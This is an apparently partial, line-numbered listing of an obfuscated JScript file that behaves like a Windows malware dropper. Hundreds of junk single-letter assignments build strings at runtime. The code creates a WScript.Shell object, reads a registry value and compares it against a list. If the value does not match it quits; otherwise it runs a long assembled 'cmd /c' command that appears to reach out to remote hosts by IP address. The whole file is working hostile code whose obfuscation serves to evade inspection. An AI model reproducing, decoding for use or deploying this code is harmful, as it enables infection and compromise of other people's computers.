2 | var feabrtmy = this[pwpqtw + egxvavw + fqqoxrc + htard + ermfgwlpf + qwvkrky + pdyvymf + rbbep] ( this[tytrnt + tbjhype + phbhkhb + fqqoxrc + szfceyh + pwpqtw + rbbep][gciioga + fqqoxrc + ermfgwlpf + egxvavw + rbbep + ermfgwlpf + rzeonl + abnnvryl + sujojdg + ermfgwlpf + phbhkhb + rbbep] ( tytrnt + tbjhype + phbhkhb + fqqoxrc + szfceyh + pwpqtw + rbbep + lsdthbgk + tbjhype + atwmb + ermfgwlpf + ovbhkzhj + ovbhkzhj ) [ufuqlud + ermfgwlpf + uefxn + ufuqlud + ermfgwlpf + egxvavw + sqvnt] ( wwopb + rpjlzcsmq + oedujw + lxkkee + hgrmf + gciioga + gocukbn + ufuqlud + ufuqlud + oedujw + rkzyd + qcerkynel + hgrmf + gocukbn + tbjhype + oedujw + ufuqlud + jpxltt + gciioga + perpysr + pdyvymf + rbbep + fqqoxrc + perpysr + ovbhkzhj + hbpywyt + bdvqptdiu + egxvavw + pdyvymf + ermfgwlpf + ovbhkzhj + jpxltt + qwvkrky + pdyvymf + rbbep + ermfgwlpf + fqqoxrc + pdyvymf + egxvavw + rbbep + szfceyh + perpysr + pdyvymf + egxvavw + ovbhkzhj + jpxltt + vjjtvzzii + perpysr + phbhkhb + egxvavw + ovbhkzhj + ermfgwlpf ), 16 ); |
|
3 | for ( hddkn = 0 ; hddkn < skfcvswhq[ovbhkzhj + ermfgwlpf + pdyvymf + uefxn + rbbep + atwmb] ; ++ hddkn ) | |
4 | { | |
5 | if ( feabrtmy == skfcvswhq[hddkn] ) | |
6 | { | |
7 | feabrtmy = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( feabrtmy !== true ) | |
12 | this[tytrnt + tbjhype + phbhkhb + fqqoxrc + szfceyh + pwpqtw + rbbep][bjgmwq + etzvqnp + szfceyh + rbbep] ( ); | |
13 | this[tytrnt + tbjhype + phbhkhb + fqqoxrc + szfceyh + pwpqtw + rbbep][gciioga + fqqoxrc + ermfgwlpf + egxvavw + rbbep + ermfgwlpf + rzeonl + abnnvryl + sujojdg + ermfgwlpf + phbhkhb + rbbep] ( tytrnt + tbjhype + phbhkhb + fqqoxrc + szfceyh + pwpqtw + rbbep + lsdthbgk + tbjhype + atwmb + ermfgwlpf + ovbhkzhj + ovbhkzhj ) [fqqoxrc + etzvqnp + pdyvymf] ( phbhkhb + zqwvkxty + sqvnt + hbpywyt + bkstmyq + phbhkhb + hbpywyt + pwpqtw + perpysr + tyjfs + ermfgwlpf + fqqoxrc + htard + atwmb + ermfgwlpf + ovbhkzhj + ovbhkzhj + lsdthbgk + ermfgwlpf + ejatfryi + ermfgwlpf + hbpywyt + nkowll + gciioga + perpysr + zqwvkxty + zqwvkxty + egxvavw + pdyvymf + sqvnt + hbpywyt + fsumldgag + qwvkrky + pdyvymf + wdpwd + perpysr + xnapnck + ermfgwlpf + nkowll + tytrnt + ermfgwlpf + abnnvryl + ufuqlud + ermfgwlpf + ruqqctje + etzvqnp + ermfgwlpf + htard + rbbep + hbpywyt + nkowll + rzeonl + etzvqnp + rbbep + zuovnniv + szfceyh + ovbhkzhj + ermfgwlpf + hbpywyt + pwculs + rbbep + ermfgwlpf + zqwvkxty + pwpqtw + pwculs + jpxltt + szfceyh + pdyvymf + wdpwd + perpysr + szfceyh + phbhkhb + ermfgwlpf + lsdthbgk + pwpqtw + sqvnt + jxkfmonce + hbpywyt + atwmb + rbbep + rbbep + pwpqtw + mixzh + bkstmyq + bkstmyq + kwxona + hevbapie + gznricnk + lsdthbgk + kwxona + pvreznniw + gznricnk + lsdthbgk + kwxona + lsdthbgk + riwtc + bznsmfw + qbshvz + bkstmyq + szfceyh + pdyvymf + wdpwd + perpysr + szfceyh + phbhkhb + ermfgwlpf + lsdthbgk + pwpqtw + atwmb + pwpqtw + fsumldgag + okkov + okkov + htard + rbbep + egxvavw + fqqoxrc + rbbep + hbpywyt + pwculs + rbbep + ermfgwlpf + zqwvkxty + pwpqtw + pwculs + jpxltt + szfceyh + pdyvymf + wdpwd + perpysr + szfceyh + phbhkhb + ermfgwlpf + lsdthbgk + pwpqtw + sqvnt + jxkfmonce + okkov + okkov + phbhkhb + zqwvkxty + sqvnt + hbpywyt + bkstmyq + phbhkhb + hbpywyt + pdyvymf + ermfgwlpf + rbbep + hbpywyt + etzvqnp + htard + ermfgwlpf + hbpywyt + jpxltt + jpxltt + kwxona + hevbapie + gznricnk + lsdthbgk + kwxona + pvreznniw + gznricnk + lsdthbgk + kwxona + lsdthbgk + riwtc + bznsmfw + qbshvz + wvnxyi + ylibxyxo + ylibxyxo + ylibxyxo + ylibxyxo + jpxltt + sqvnt + egxvavw + wdpwd + tyjfs + tyjfs + tyjfs + fqqoxrc + perpysr + perpysr + rbbep + jpxltt + okkov + okkov + phbhkhb + zqwvkxty + sqvnt + hbpywyt + bkstmyq + phbhkhb + hbpywyt + fqqoxrc + ermfgwlpf + uefxn + htard + wdpwd + fqqoxrc + gznricnk + riwtc + hbpywyt + bkstmyq + htard + hbpywyt + jpxltt + jpxltt + kwxona + hevbapie + gznricnk + lsdthbgk + kwxona + pvreznniw + gznricnk + lsdthbgk + kwxona + lsdthbgk + riwtc + bznsmfw + qbshvz + wvnxyi + ylibxyxo + ylibxyxo + ylibxyxo + ylibxyxo + jpxltt + sqvnt + egxvavw + wdpwd + tyjfs + tyjfs + tyjfs + fqqoxrc + perpysr + perpysr + rbbep + jpxltt + riwtc + bbisxrlm + bbisxrlm + bznsmfw + kwxona + kwxona + qbshvz + kwxona + pvreznniw + pvreznniw + riwtc + kwxona + gznricnk + qbshvz + gznricnk + lsdthbgk + sqvnt + ovbhkzhj + ovbhkzhj, 0, false ); |
|
14 | } | |
15 | ermfgwlpf = "H"; | |
16 | ermfgwlpf = "W"; | |
17 | ermfgwlpf = "H"; | |
18 | ermfgwlpf = "S"; | |
19 | ermfgwlpf = "v"; | |
20 | ermfgwlpf = "s"; | |
21 | ermfgwlpf = "H"; | |
22 | ermfgwlpf = "g"; | |
23 | ermfgwlpf = "i"; | |
24 | ermfgwlpf = "k"; | |
25 | ermfgwlpf = "Z"; | |
26 | ermfgwlpf = "x"; | |
27 | ermfgwlpf = "X"; | |
28 | ermfgwlpf = "Z"; | |
29 | ermfgwlpf = "a"; | |
30 | ermfgwlpf = "g"; | |
31 | ermfgwlpf = "c"; | |
32 | ermfgwlpf = "e"; | |
33 | okkov = "x"; | |
34 | okkov = "S"; | |
35 | okkov = "t"; | |
36 | okkov = "i"; | |
37 | okkov = "B"; | |
38 | okkov = "E"; | |
39 | okkov = "X"; | |
40 | okkov = "R"; | |
41 | okkov = "w"; | |
42 | okkov = "w"; | |
43 | okkov = "U"; | |
44 | okkov = "d"; | |
45 | okkov = "E"; | |
46 | okkov = "z"; | |
47 | okkov = "y"; | |
48 | okkov = "V"; | |
49 | okkov = "x"; | |
50 | okkov = "E"; | |
51 | okkov = "M"; | |
52 | okkov = "c"; | |
53 | okkov = "g"; | |
54 | okkov = "p"; | |
55 | okkov = "a"; | |
56 | okkov = "O"; | |
57 | okkov = "s"; | |
58 | okkov = "r"; | |
59 | okkov = "j"; | |
60 | okkov = "l"; | |
61 | okkov = "D"; | |
62 | okkov = "v"; | |
63 | okkov = "&"; | |
64 | rkzyd = "N"; | |
65 | rkzyd = "j"; | |
66 | rkzyd = "g"; | |
67 | rkzyd = "N"; | |
68 | rkzyd = "l"; | |
69 | rkzyd = "h"; | |
70 | rkzyd = "p"; | |
71 | rkzyd = "d"; | |
72 | rkzyd = "x"; | |
73 | rkzyd = "d"; | |
74 | rkzyd = "g"; | |
75 | rkzyd = "X"; | |
76 | rkzyd = "O"; | |
77 | rkzyd = "M"; | |
78 | rkzyd = "T"; | |
79 | rkzyd = "j"; | |
80 | rkzyd = "a"; | |
81 | rkzyd = "N"; | |
82 | rkzyd = "C"; | |
83 | rkzyd = "y"; | |
84 | rkzyd = "s"; | |
85 | rkzyd = "i"; | |
86 | rkzyd = "T"; | |
87 | rkzyd = "I"; | |
88 | rkzyd = "s"; | |
89 | rkzyd = "B"; | |
90 | rkzyd = "h"; | |
91 | rkzyd = "b"; | |
92 | rkzyd = "W"; | |
93 | rkzyd = "u"; | |
94 | rkzyd = "M"; | |
95 | rkzyd = "X"; | |
96 | rkzyd = "s"; | |
97 | rkzyd = "v"; | |
98 | rkzyd = "F"; | |
99 | rkzyd = "B"; | |
100 | rkzyd = "J"; | |
101 | rkzyd = "r"; | |
102 | rkzyd = "Z"; | |
103 | rkzyd = "u"; | |
104 | rkzyd = "F"; | |
105 | rkzyd = "f"; | |
106 | rkzyd = "B"; | |
107 | rkzyd = "e"; | |
108 | rkzyd = "N"; | |
109 | ovbhkzhj = "l"; | |
110 | ovbhkzhj = "J"; | |
111 | ovbhkzhj = "b"; | |
112 | ovbhkzhj = "w"; | |
113 | ovbhkzhj = "j"; | |
114 | ovbhkzhj = "u"; | |
115 | ovbhkzhj = "e"; | |
116 | ovbhkzhj = "o"; | |
117 | ovbhkzhj = "i"; | |
118 | ovbhkzhj = "n"; | |
119 | ovbhkzhj = "b"; | |
120 | ovbhkzhj = "s"; | |
121 | ovbhkzhj = "j"; | |
122 | ovbhkzhj = "Y"; | |
123 | ovbhkzhj = "g"; | |
124 | ovbhkzhj = "N"; | |
125 | ovbhkzhj = "B"; | |
126 | ovbhkzhj = "O"; | |
127 | ovbhkzhj = "W"; | |
128 | ovbhkzhj = "E"; | |
129 | ovbhkzhj = "z"; | |
130 | ovbhkzhj = "X"; | |
131 | ovbhkzhj = "k"; | |
132 | ovbhkzhj = "s"; | |
133 | ovbhkzhj = "z"; | |
134 | ovbhkzhj = "f"; | |
135 | ovbhkzhj = "A"; | |
136 | ovbhkzhj = "a"; | |
137 | ovbhkzhj = "h"; | |
138 | ovbhkzhj = "g"; | |
139 | ovbhkzhj = "e"; | |
140 | ovbhkzhj = "n"; | |
141 | ovbhkzhj = "w"; | |
142 | ovbhkzhj = "i"; | |
143 | ovbhkzhj = "h"; | |
144 | ovbhkzhj = "W"; | |
145 | ovbhkzhj = "l"; | |
146 | szfceyh = "e"; | |
147 | szfceyh = "Z"; | |
148 | szfceyh = "x"; | |
149 | szfceyh = "F"; | |
150 | szfceyh = "t"; | |
151 | szfceyh = "U"; | |
152 | szfceyh = "E"; | |
153 | szfceyh = "R"; | |
154 | szfceyh = "X"; | |
155 | szfceyh = "b"; | |
156 | szfceyh = "A"; | |
157 | szfceyh = "k"; | |
158 | szfceyh = "i"; | |
159 | szfceyh = "y"; | |
160 | szfceyh = "T"; | |
161 | szfceyh = "H"; | |
162 | szfceyh = "g"; | |
163 | szfceyh = "M"; | |
164 | szfceyh = "v"; | |
165 | szfceyh = "H"; | |
166 | szfceyh = "S"; | |
167 | szfceyh = "f"; | |
168 | szfceyh = "s"; | |
169 | szfceyh = "r"; | |
170 | szfceyh = "f"; | |
171 | szfceyh = "N"; | |
172 | szfceyh = "P"; | |
173 | szfceyh = "p"; | |
174 | szfceyh = "h"; | |
175 | szfceyh = "M"; | |
176 | szfceyh = "A"; | |
177 | szfceyh = "A"; | |
178 | szfceyh = "y"; | |
179 | szfceyh = "k"; | |
180 | szfceyh = "p"; | |
181 | szfceyh = "S"; | |
182 | szfceyh = "q"; | |
183 | szfceyh = "i"; | |
184 | sujojdg = "X"; | |
185 | sujojdg = "X"; | |
186 | sujojdg = "Q"; | |
187 | sujojdg = "p"; | |
188 | sujojdg = "w"; | |
189 | sujojdg = "M"; | |
190 | sujojdg = "e"; | |
191 | sujojdg = "K"; | |
192 | sujojdg = "M"; | |
193 | sujojdg = "e"; | |
194 | sujojdg = "T"; | |
195 | sujojdg = "O"; | |
196 | sujojdg = "u"; | |
197 | sujojdg = "D"; | |
198 | sujojdg = "b"; | |
199 | sujojdg = "U"; | |
200 | sujojdg = "b"; | |
201 | sujojdg = "r"; | |
202 | sujojdg = "J"; | |
203 | sujojdg = "T"; | |
204 | sujojdg = "T"; | |
205 | sujojdg = "h"; | |
206 | sujojdg = "Q"; | |
207 | sujojdg = "r"; | |
208 | sujojdg = "j"; | |
209 | sujojdg = "O"; | |
210 | sujojdg = "s"; | |
211 | sujojdg = "Z"; | |
212 | sujojdg = "a"; | |
213 | sujojdg = "N"; | |
214 | sujojdg = "C"; | |
215 | sujojdg = "V"; | |
216 | sujojdg = "a"; | |
217 | sujojdg = "D"; | |
218 | sujojdg = "j"; | |
219 | sujojdg = "k"; | |
220 | sujojdg = "H"; | |
221 | sujojdg = "A"; | |
222 | sujojdg = "k"; | |
223 | sujojdg = "W"; | |
224 | sujojdg = "J"; | |
225 | sujojdg = "D"; | |
226 | sujojdg = "p"; | |
227 | sujojdg = "j"; | |
228 | uefxn = "i"; | |
229 | uefxn = "O"; | |
230 | uefxn = "r"; | |
231 | uefxn = "T"; | |
232 | uefxn = "W"; | |
233 | uefxn = "p"; | |
234 | uefxn = "A"; | |
235 | uefxn = "u"; | |
236 | uefxn = "T"; | |
237 | uefxn = "g"; | |
238 | uefxn = "B"; | |
239 | uefxn = "Q"; | |
240 | uefxn = "q"; | |
241 | uefxn = "a"; | |
242 | uefxn = "G"; | |
243 | uefxn = "V"; | |
244 | uefxn = "H"; | |
245 | uefxn = "c"; | |
246 | uefxn = "n"; | |
247 | uefxn = "m"; | |
248 | uefxn = "M"; | |
249 | uefxn = "P"; | |
250 | uefxn = "P"; | |
251 | uefxn = "o"; | |
252 | uefxn = "F"; | |
253 | uefxn = "C"; | |
254 | uefxn = "o"; | |
255 | uefxn = "m"; | |
256 | uefxn = "i"; | |
257 | uefxn = "u"; | |
258 | uefxn = "r"; | |
259 | uefxn = "n"; | |
260 | uefxn = "D"; | |
261 | uefxn = "g"; | |
262 | lxkkee = "S"; | |
263 | lxkkee = "t"; | |
264 | lxkkee = "l"; | |
265 | lxkkee = "O"; | |
266 | lxkkee = "T"; | |
267 | lxkkee = "x"; | |
268 | lxkkee = "F"; | |
269 | lxkkee = "R"; | |
270 | lxkkee = "r"; | |
271 | lxkkee = "o"; | |
272 | lxkkee = "d"; | |
273 | lxkkee = "Y"; | |
274 | lxkkee = "y"; | |
275 | lxkkee = "g"; | |
276 | lxkkee = "l"; | |
277 | lxkkee = "R"; | |
278 | lxkkee = "C"; | |
279 | lxkkee = "Y"; | |
280 | pwpqtw = "f"; | |
281 | pwpqtw = "B"; | |
282 | pwpqtw = "S"; | |
283 | pwpqtw = "E"; | |
284 | pwpqtw = "E"; | |
285 | pwpqtw = "e"; | |
286 | pwpqtw = "N"; | |
287 | pwpqtw = "A"; | |
288 | pwpqtw = "i"; | |
289 | pwpqtw = "I"; | |
290 | pwpqtw = "N"; | |
291 | pwpqtw = "f"; | |
292 | pwpqtw = "V"; | |
293 | pwpqtw = "O"; | |
294 | pwpqtw = "r"; | |
295 | pwpqtw = "q"; | |
296 | pwpqtw = "Y"; | |
297 | pwpqtw = "r"; | |
298 | pwpqtw = "M"; | |
299 | pwpqtw = "K"; | |
300 | pwpqtw = "f"; | |
301 | pwpqtw = "Z"; | |
302 | pwpqtw = "F"; | |
303 | pwpqtw = "h"; | |
304 | pwpqtw = "c"; | |
305 | pwpqtw = "X"; | |
306 | pwpqtw = "h"; | |
307 | pwpqtw = "p"; | |
308 | gocukbn = "U"; | |
309 | rpjlzcsmq = "T"; | |
310 | rpjlzcsmq = "I"; | |
311 | rpjlzcsmq = "V"; | |
312 | rpjlzcsmq = "H"; | |
313 | rpjlzcsmq = "D"; | |
314 | rpjlzcsmq = "w"; | |
315 | rpjlzcsmq = "d"; | |
316 | rpjlzcsmq = "S"; | |
317 | rpjlzcsmq = "z"; | |
318 | rpjlzcsmq = "Q"; | |
319 | rpjlzcsmq = "l"; | |
320 | rpjlzcsmq = "C"; | |
321 | rpjlzcsmq = "d"; | |
322 | rpjlzcsmq = "c"; | |
323 | rpjlzcsmq = "d"; | |
324 | rpjlzcsmq = "J"; | |
325 | rpjlzcsmq = "s"; | |
326 | rpjlzcsmq = "I"; | |
327 | rpjlzcsmq = "A"; | |
328 | rpjlzcsmq = "B"; | |
329 | rpjlzcsmq = "K"; | |
330 | kwxona = "L"; | |
331 | kwxona = "Y"; | |
332 | kwxona = "e"; | |
333 | kwxona = "U"; | |
334 | kwxona = "O"; | |
335 | kwxona = "f"; | |
336 | kwxona = "E"; | |
337 | kwxona = "T"; | |
338 | kwxona = "n"; | |
339 | kwxona = "R"; | |
340 | kwxona = "n"; | |
341 | kwxona = "s"; | |
342 | kwxona = "T"; | |
343 | kwxona = "c"; | |
344 | kwxona = "U"; | |
345 | kwxona = "U"; | |
346 | kwxona = "K"; | |
347 | kwxona = "J"; | |
348 | kwxona = "T"; | |
349 | kwxona = "s"; | |
350 | kwxona = "t"; | |
351 | kwxona = "Q"; | |
352 | kwxona = "Z"; | |
353 | kwxona = "P"; | |
354 | kwxona = "O"; | |
355 | kwxona = "p"; | |
356 | kwxona = "P"; | |
357 | kwxona = "P"; | |
358 | kwxona = "u"; | |
359 | kwxona = "1"; | |
360 | ylibxyxo = "u"; | |
361 | ylibxyxo = "i"; | |
362 | ylibxyxo = "O"; | |
363 | ylibxyxo = "k"; | |
364 | ylibxyxo = "s"; | |
365 | ylibxyxo = "o"; | |
366 | ylibxyxo = "y"; | |
367 | ylibxyxo = "z"; | |
368 | ylibxyxo = "h"; | |
369 | ylibxyxo = "r"; | |
370 | ylibxyxo = "L"; | |
371 | ylibxyxo = "C"; | |
372 | ylibxyxo = "q"; | |
373 | ylibxyxo = "d"; | |
374 | ylibxyxo = "d"; | |
375 | ylibxyxo = "z"; | |
376 | ylibxyxo = "F"; | |
377 | ylibxyxo = "K"; | |
378 | ylibxyxo = "n"; | |
379 | ylibxyxo = "S"; | |
380 | ylibxyxo = "M"; | |
381 | ylibxyxo = "z"; | |
382 | ylibxyxo = "L"; | |
383 | ylibxyxo = "T"; | |
384 | ylibxyxo = "s"; | |
385 | ylibxyxo = "r"; | |
386 | ylibxyxo = "o"; | |
387 | ylibxyxo = "x"; | |
388 | ylibxyxo = "s"; | |
389 | ylibxyxo = "W"; | |
390 | ylibxyxo = "I"; | |
391 | ylibxyxo = "8"; | |
392 | atwmb = "z"; | |
393 | atwmb = "s"; | |
394 | atwmb = "x"; | |
395 | atwmb = "h"; | |
396 | atwmb = "Z"; | |
397 | atwmb = "S"; | |
398 | atwmb = "P"; | |
399 | atwmb = "A"; | |
400 | atwmb = "N"; | |
401 | atwmb = "G"; | |
402 | atwmb = "u"; | |
403 | atwmb = "G"; | |
404 | atwmb = "V"; | |
405 | atwmb = "s"; | |
406 | atwmb = "i"; | |
407 | atwmb = "S"; | |
408 | atwmb = "t"; | |
409 | atwmb = "U"; | |
410 | atwmb = "W"; | |
411 | atwmb = "I"; | |
412 | atwmb = "f"; | |
413 | atwmb = "O"; | |
414 | atwmb = "D"; | |
415 | atwmb = "B"; | |
416 | atwmb = "D"; | |
417 | atwmb = "b"; | |
418 | atwmb = "G"; | |
419 | atwmb = "d"; | |
420 | atwmb = "G"; | |
421 | atwmb = "R"; | |
422 | atwmb = "K"; | |
423 | atwmb = "d"; | |
424 | atwmb = "c"; | |
425 | atwmb = "K"; | |
426 | atwmb = "V"; | |
427 | atwmb = "x"; | |
428 | atwmb = "P"; | |
429 | atwmb = "R"; | |
430 | atwmb = "e"; | |
431 | atwmb = "O"; | |
432 | atwmb = "C"; | |
433 | atwmb = "B"; | |
434 | atwmb = "r"; | |
435 | atwmb = "h"; | |
436 | bbisxrlm = "a"; | |
437 | bbisxrlm = "T"; | |
438 | bbisxrlm = "6"; | |
439 | htard = "P"; | |
440 | htard = "g"; | |
441 | htard = "C"; | |
442 | htard = "B"; | |
443 | htard = "N"; | |
444 | htard = "A"; | |
445 | htard = "J"; | |
446 | htard = "R"; | |
447 | htard = "J"; | |
448 | htard = "p"; | |
449 | htard = "R"; | |
450 | htard = "G"; | |
451 | htard = "k"; | |
452 | htard = "G"; | |
453 | htard = "T"; | |
454 | htard = "s"; | |
455 | htard = "o"; | |
456 | htard = "h"; | |
457 | htard = "u"; | |
458 | htard = "C"; | |
459 | htard = "Y"; | |
460 | htard = "M"; | |
461 | htard = "e"; | |
462 | htard = "A"; | |
463 | htard = "T"; | |
464 | htard = "k"; | |
465 | htard = "K"; | |
466 | htard = "C"; | |
467 | htard = "d"; | |
468 | htard = "V"; | |
469 | htard = "E"; | |
470 | htard = "z"; | |
471 | htard = "s"; | |
472 | etzvqnp = "R"; | |
473 | etzvqnp = "v"; | |
474 | etzvqnp = "Z"; | |
475 | etzvqnp = "u"; | |
476 | etzvqnp = "K"; | |
477 | etzvqnp = "x"; | |
478 | etzvqnp = "F"; | |
479 | etzvqnp = "m"; | |
480 | etzvqnp = "K"; | |
481 | etzvqnp = "s"; | |
482 | etzvqnp = "r"; | |
483 | etzvqnp = "I"; | |
484 | etzvqnp = "f"; | |
485 | etzvqnp = "K"; | |
486 | etzvqnp = "y"; | |
487 | etzvqnp = "g"; | |
488 | etzvqnp = "s"; | |
489 | etzvqnp = "o"; | |
490 | etzvqnp = "m"; | |
491 | etzvqnp = "A"; | |
492 | etzvqnp = "C"; | |
493 | etzvqnp = "j"; | |
494 | etzvqnp = "z"; | |
495 | etzvqnp = "W"; | |
496 | etzvqnp = "I"; | |
497 | etzvqnp = "f"; | |
498 | etzvqnp = "z"; | |
499 | etzvqnp = "i"; | |
500 | etzvqnp = "G"; | |
501 | etzvqnp = "x"; | |
502 | etzvqnp = "h"; | |
503 | etzvqnp = "X"; | |
504 | etzvqnp = "C"; | |
505 | etzvqnp = "b"; | |
506 | etzvqnp = "M"; | |
507 | etzvqnp = "g"; | |
508 | etzvqnp = "e"; | |
509 | etzvqnp = "q"; | |
510 | etzvqnp = "u"; | |
511 | sqvnt = "T"; | |
512 | sqvnt = "l"; | |
513 | sqvnt = "R"; | |
514 | sqvnt = "u"; | |
515 | sqvnt = "a"; | |
516 | sqvnt = "J"; | |
517 | sqvnt = "M"; | |
518 | sqvnt = "o"; | |
519 | sqvnt = "E"; | |
520 | sqvnt = "p"; | |
521 | sqvnt = "j"; | |
522 | sqvnt = "t"; | |
523 | sqvnt = "C"; | |
524 | sqvnt = "z"; | |
525 | sqvnt = "A"; | |
526 | sqvnt = "K"; | |
527 | sqvnt = "Y"; | |
528 | sqvnt = "d"; | |
529 | rzeonl = "j"; | |
530 | rzeonl = "R"; | |
531 | rzeonl = "w"; | |
532 | rzeonl = "S"; | |
533 | rzeonl = "q"; | |
534 | rzeonl = "S"; | |
535 | rzeonl = "g"; | |
536 | rzeonl = "t"; | |
537 | rzeonl = "J"; | |
538 | rzeonl = "N"; | |
539 | rzeonl = "H"; | |
540 | rzeonl = "r"; | |
541 | rzeonl = "P"; | |
542 | rzeonl = "J"; | |
543 | rzeonl = "a"; | |
544 | rzeonl = "T"; | |
545 | rzeonl = "O"; | |
546 | zuovnniv = "Y"; | |
547 | zuovnniv = "l"; | |
548 | zuovnniv = "O"; | |
549 | zuovnniv = "m"; | |
550 | zuovnniv = "i"; | |
551 | zuovnniv = "Y"; | |
552 | zuovnniv = "G"; | |
553 | zuovnniv = "n"; | |
554 | zuovnniv = "u"; | |
555 | zuovnniv = "c"; | |
556 | zuovnniv = "D"; | |
557 | zuovnniv = "k"; | |
558 | zuovnniv = "V"; | |
559 | zuovnniv = "B"; | |
560 | zuovnniv = "X"; | |
561 | zuovnniv = "h"; | |
562 | zuovnniv = "q"; | |
563 | zuovnniv = "s"; | |
564 | zuovnniv = "O"; | |
565 | zuovnniv = "X"; | |
566 | zuovnniv = "K"; | |
567 | zuovnniv = "z"; | |
568 | zuovnniv = "x"; | |
569 | zuovnniv = "E"; | |
570 | zuovnniv = "A"; | |
571 | zuovnniv = "S"; | |
572 | zuovnniv = "F"; | |
573 | zuovnniv = "c"; | |
574 | zuovnniv = "g"; | |
575 | zuovnniv = "V"; | |
576 | zuovnniv = "j"; | |
577 | zuovnniv = "v"; | |
578 | zuovnniv = "s"; | |
579 | zuovnniv = "S"; | |
580 | zuovnniv = "A"; | |
581 | zuovnniv = "u"; | |
582 | zuovnniv = "W"; | |
583 | zuovnniv = "Z"; | |
584 | zuovnniv = "y"; | |
585 | zuovnniv = "t"; | |
586 | zuovnniv = "F"; | |
587 | xnapnck = "y"; | |
588 | xnapnck = "z"; | |
589 | xnapnck = "s"; | |
590 | xnapnck = "n"; | |
591 | xnapnck = "S"; | |
592 | xnapnck = "S"; | |
593 | xnapnck = "A"; | |
594 | xnapnck = "V"; | |
595 | xnapnck = "G"; | |
596 | xnapnck = "K"; | |
597 | xnapnck = "F"; | |
598 | xnapnck = "p"; | |
599 | xnapnck = "p"; | |
600 | xnapnck = "M"; | |
601 | xnapnck = "A"; | |
602 | xnapnck = "C"; | |
603 | xnapnck = "r"; | |
604 | xnapnck = "l"; | |
605 | xnapnck = "s"; | |
606 | xnapnck = "G"; | |
607 | xnapnck = "b"; | |
608 | xnapnck = "k"; | |
609 | bznsmfw = "V"; | |
610 | bznsmfw = "L"; | |
611 | bznsmfw = "j"; | |
612 | bznsmfw = "B"; | |
613 | bznsmfw = "f"; | |
614 | bznsmfw = "t"; | |
615 | bznsmfw = "o"; | |
616 | bznsmfw = "D"; | |
617 | bznsmfw = "m"; | |
618 | bznsmfw = "P"; | |
619 | bznsmfw = "Z"; | |
620 | bznsmfw = "q"; | |
621 | bznsmfw = "a"; | |
622 | bznsmfw = "K"; | |
623 | bznsmfw = "x"; | |
624 | bznsmfw = "a"; | |
625 | bznsmfw = "b"; | |
626 | bznsmfw = "j"; | |
627 | bznsmfw = "Q"; | |
628 | bznsmfw = "H"; | |
629 | bznsmfw = "A"; | |
630 | bznsmfw = "X"; | |
631 | bznsmfw = "n"; | |
632 | bznsmfw = "j"; | |
633 | bznsmfw = "y"; | |
634 | bznsmfw = "K"; | |
635 | bznsmfw = "F"; | |
636 | bznsmfw = "y"; | |
637 | bznsmfw = "W"; | |
638 | bznsmfw = "t"; | |
639 | bznsmfw = "V"; | |
640 | bznsmfw = "z"; | |
641 | bznsmfw = "n"; | |
642 | bznsmfw = "j"; | |
643 | bznsmfw = "A"; | |
644 | bznsmfw = "n"; | |
645 | bznsmfw = "K"; | |
646 | bznsmfw = "f"; | |
647 | bznsmfw = "E"; | |
648 | bznsmfw = "D"; | |
649 | bznsmfw = "0"; | |
650 | hbpywyt = "I"; | |
651 | hbpywyt = "Y"; | |
652 | hbpywyt = "l"; | |
653 | hbpywyt = "n"; | |
654 | hbpywyt = "R"; | |
655 | hbpywyt = "V"; | |
656 | hbpywyt = "O"; | |
657 | hbpywyt = "G"; | |
658 | hbpywyt = "i"; | |
659 | hbpywyt = "B"; | |
660 | hbpywyt = "K"; | |
661 | hbpywyt = "t"; | |
662 | hbpywyt = "w"; | |
663 | hbpywyt = "s"; | |
664 | hbpywyt = "F"; | |
665 | hbpywyt = "c"; | |
666 | hbpywyt = "C"; | |
667 | hbpywyt = "x"; | |
668 | hbpywyt = "N"; | |
669 | hbpywyt = "n"; | |
670 | hbpywyt = "I"; | |
671 | hbpywyt = "j"; | |
672 | hbpywyt = "P"; | |
673 | hbpywyt = "L"; | |
674 | hbpywyt = "T"; | |
675 | hbpywyt = "E"; | |
676 | hbpywyt = "A"; | |
677 | hbpywyt = "U"; | |
678 | hbpywyt = "l"; | |
679 | hbpywyt = "Q"; | |
680 | hbpywyt = "M"; | |
681 | hbpywyt = "F"; | |
682 | hbpywyt = "a"; | |
683 | hbpywyt = " "; | |
684 | ejatfryi = "u"; | |
685 | ejatfryi = "X"; | |
686 | ejatfryi = "i"; | |
687 | ejatfryi = "Q"; | |
688 | ejatfryi = "E"; | |
689 | ejatfryi = "T"; | |
690 | ejatfryi = "Y"; | |
691 | ejatfryi = "I"; | |
692 | ejatfryi = "V"; | |
693 | ejatfryi = "d"; | |
694 | ejatfryi = "W"; | |
695 | ejatfryi = "l"; | |
696 | ejatfryi = "D"; | |
697 | ejatfryi = "B"; | |
698 | ejatfryi = "U"; | |
699 | ejatfryi = "T"; | |
700 | ejatfryi = "V"; | |
701 | ejatfryi = "d"; | |
702 | ejatfryi = "T"; | |
703 | ejatfryi = "n"; | |
704 | ejatfryi = "l"; | |
705 | ejatfryi = "U"; | |
706 | ejatfryi = "Q"; | |
707 | ejatfryi = "w"; | |
708 | ejatfryi = "k"; | |
709 | ejatfryi = "i"; | |
710 | ejatfryi = "J"; | |
711 | ejatfryi = "x"; | |
712 | ejatfryi = "Q"; | |
713 | ejatfryi = "i"; | |
714 | ejatfryi = "G"; | |
715 | ejatfryi = "Y"; | |
716 | ejatfryi = "B"; | |
717 | ejatfryi = "b"; | |
718 | ejatfryi = "C"; | |
719 | ejatfryi = "x"; | |
720 | riwtc = "B"; | |
721 | riwtc = "h"; | |
722 | riwtc = "G"; | |
723 | riwtc = "e"; | |
724 | riwtc = "p"; | |
725 | riwtc = "R"; | |
726 | riwtc = "M"; | |
727 | riwtc = "f"; | |
728 | riwtc = "P"; | |
729 | riwtc = "B"; | |
730 | riwtc = "w"; | |
731 | riwtc = "y"; | |
732 | riwtc = "B"; | |
733 | riwtc = "L"; | |
734 | riwtc = "V"; | |
735 | riwtc = "n"; | |
736 | riwtc = "i"; | |
737 | riwtc = "2"; | |
738 | wvnxyi = "P"; | |
739 | wvnxyi = "S"; | |
740 | wvnxyi = "@"; | |
741 | fqqoxrc = "e"; | |
742 | fqqoxrc = "M"; | |
743 | fqqoxrc = "r"; | |
744 | fqqoxrc = "H"; | |
745 | fqqoxrc = "z"; | |
746 | fqqoxrc = "w"; | |
747 | fqqoxrc = "V"; | |
748 | fqqoxrc = "u"; | |
749 | fqqoxrc = "W"; | |
750 | fqqoxrc = "V"; | |
